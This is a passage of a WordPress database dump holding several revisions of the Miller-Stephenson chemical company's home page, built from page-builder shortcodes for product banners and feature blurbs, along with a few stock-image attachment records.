market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 15:15:23', '2017-05-01 15:15:23', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4114, 2, '2017-05-01 15:16:25', '2017-05-01 15:16:25', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4104" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[button text="CONFORMAL COATINGS" size="large"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 15:16:25', '2017-05-01 15:16:25', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4115, 2, '2017-05-01 15:18:41', '2017-05-01 15:18:41', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4104" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="40" position_y="15" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 15:18:41', '2017-05-01 15:18:41', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4116, 2, '2017-05-01 15:26:26', '2017-05-01 15:26:26', '', 'shutterstock_143173957', '', 'inherit', 'closed', 'closed', '', 'shutterstock_143173957', '', '', '2017-05-01 15:26:26', '2017-05-01 15:26:26', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_143173957.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4117, 2, '2017-05-01 15:26:54', '2017-05-01 15:26:54', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4116" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="40" position_y="15" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 15:26:54', '2017-05-01 15:26:54', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4118, 2, '2017-05-01 15:27:33', '2017-05-01 15:27:33', '', 'shutterstock_347358461', '', 'inherit', 'closed', 'closed', '', 'shutterstock_347358461', '', '', '2017-05-01 15:27:33', '2017-05-01 15:27:33', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_347358461.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4119, 2, '2017-05-01 15:29:14', '2017-05-01 15:29:14', '', 'shutterstock_384201610', '', 'inherit', 'closed', 'closed', '', 'shutterstock_384201610', '', '', '2017-05-01 15:29:14', '2017-05-01 15:29:14', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_384201610.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4120, 2, '2017-05-01 15:29:54', '2017-05-01 15:29:54', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4119" bg_size="medium" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="40" position_y="15" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 15:29:54', '2017-05-01 15:29:54', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
